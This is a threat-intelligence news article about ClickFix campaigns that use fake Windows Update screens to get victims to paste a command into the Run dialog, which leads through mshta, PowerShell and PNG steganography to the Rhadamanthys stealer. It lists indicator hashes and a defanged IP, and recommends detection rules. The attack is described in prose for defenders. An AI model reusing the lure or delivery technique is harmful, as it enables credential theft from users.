Redazione RHC : 25 November 2025 11:38
Fake Windows updates have entered a new round of ClickFix campaigns, as reported by Huntress. Attackers are increasingly replacing bot controls with full-screen blue windows that simulate a system update.
Microsoft notes that ClickFix has become the most common initial penetration method , and that many groups with varying levels of expertise have switched to this method.
The attacks begin with a visit to a malicious website that sets the browser to full-screen mode and displays a page that superficially resembles the Windows Update interface.
The victim is prompted to manually run the critical update, following a typical ClickFix scenario: open the Run dialog box with Win+R, paste the prepared command, and run it. At this point, the user effectively starts the malicious chain themselves.
The command line invokes mshta.exe with a URL, where the second octet of the IP address is always encoded in hexadecimal. PowerShell then downloads a .NET code snippet, which, after decryption, is loaded directly into memory and passes control to the next component. This is a .NET module responsible for stealthily distributing malware via steganography. It extracts the encrypted Donut Shell from the pixel data of PNG files, using individual color channels to reconstruct the payload. This approach helps circumvent signature-based protection mechanisms.
According to Huntress, from September 29 to October 30, 2025, the team analyzed 76 incidents affecting organizations in the US, EMEA, and APJ regions. One of the incidents involved traffic to 141.98.80[.]175. In all cases, the chain used a URL with a second hexadecimal octet leading to a steganographic downloader. Researchers found Russian-language comments in the source code of the pages spoofing the update but were unable to determine the authorship of the campaign.
Despite Operation Endgame targeting Rhadamanthys infrastructure on November 13th, websites hosting fake updates continued to operate until at least November 19th.
All detected decoys referenced the same hexadecimal-encoded URL structure previously associated with Rhadamanthys distribution, although the malware itself was no longer hosted on these sites. However, researchers warn that the infrastructure could change rapidly.
Both types of lures, disguised as Windows updates, eventually downloaded Rhadamanthys , which steals user credentials, onto the devices.
To reduce the risk of such attacks, it’s recommended to block the Run dialog box, inform employees about the nature of ClickFix scripts, and remind them that no legitimate update requires manual command entry. EDR-level security solutions can help monitor for instances where explorer.exe launches mshta.exe, powershell.exe, or other executable files with unusual arguments.
The following IoCs are drawn from the intelligence platform of Recorded Future , a strategic partner of Red Hot Cyber and a global leader in cyber threat intelligence. The platform provides advanced analytics to detect and counter malicious activity in cyberspace.
08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2,
9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae,
34d025ef57eb3f484301744e2b2488ae0ac76f2e226585e65bb45edbbb6b7f69,
471c981c11df004b941dad0175bc435f9c901bcb968ba9582f1a2181443d9ef4,
03c72cfabace07b6787d2d1fd66d6d6d9a2fbcb74a827ca4ab7e59aba40cb306,
81b179b050a13d5664e0d88143154bd3fc127f9ac3e7a6c16444caac1d3ab13c,
aba1e62ee9a460f5b7b67198dc22612b275a1e871d56c60324190ad69323ddf0 
Redazione